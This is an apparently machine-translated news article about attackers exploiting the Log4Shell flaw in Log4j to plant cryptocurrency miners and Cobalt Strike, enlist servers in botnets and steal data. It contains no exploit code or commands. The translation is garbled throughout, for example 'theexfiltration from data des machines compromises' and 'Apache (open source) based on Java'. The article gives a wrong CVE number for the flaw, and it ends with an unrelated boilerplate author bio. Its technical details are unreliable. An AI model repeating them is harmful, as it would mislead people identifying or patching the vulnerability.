Hackers vigorously attack servers affected by the vulnerability « Log4Shell » recently identified in Log4j. They aim to integrate cryptocurrency miners via Cobalt Strike and connect the devices in a « botnet ». Telemetry highlighted an exploitation of the flaw, 9 days before even that it was not revealed in broad daylight on December 9.
The security company Netlab commented on the case. Similar threats, such as Mirai and Muhstik (Tsunami), target vulnerable systems, she says. Indeed, Muhstik had detected a security breach criticism in Atlassian Confluence early September. These were type attacks DDoS (distributed denial of service) to render infected systems unusable.
A threat since early December
The Redmond-based tech giant says it has detected a plethora of malicious activity, including the installation of Cobalt Strike for the credentials theft, the deployment of cryptocurrency miners and theexfiltration from data des machines compromises.
“The first Log4j operation report dates from December 1 at 04:36 UTC. “
Matthew Prince, CEO de Cloudflare
This suggests that the flaw was already accessible, at least 9 days before its revelation to the general public. According to the Cisco Talos Intelligence Group report, there has already been hacker activity from the December 2.
How has the Log4Shell flaw exploited?
Most of the attacks observed by Microsoft, at present, are attempts to go through vulnerable systems. However, once an attacker controls an application, there are a myriad of goals that can be achieved.
Entitled ” CVE-2021-22448 “(CVSS score: 10.0), the flaw allows the execution of remote codes in Log4j. All the hacker had to do: send lines containing the malicious code that is logged by the version 2.0 at least Log4j.
The propagation is all the easier since Apache (open source) based on Java, is widely used in enterprises to record events and messages generated by applications. This allows hackers to upload code from a domain to a sensitive server and take control of it. Once in charge, they are capable of causing the worst havoc.
No specific target for this vulnerability. Hackers take an approach « spray-and-pray » to wreak havoc. Incidents like these illustrate how a single flaw, embedded in many software, can cause a chain reaction. Always remember it! Malware and other computer attacks start with a single line of text.
.
Source From: Fredzone
I am a news journalist with over 15 years of experience in the field. I specialize in covering world news and events. I have written for major media outlets such as The New York Times, The Wall Street Journal, and Reuters. I also have experience working with social media platforms like Facebook, Twitter, and LinkedIn.
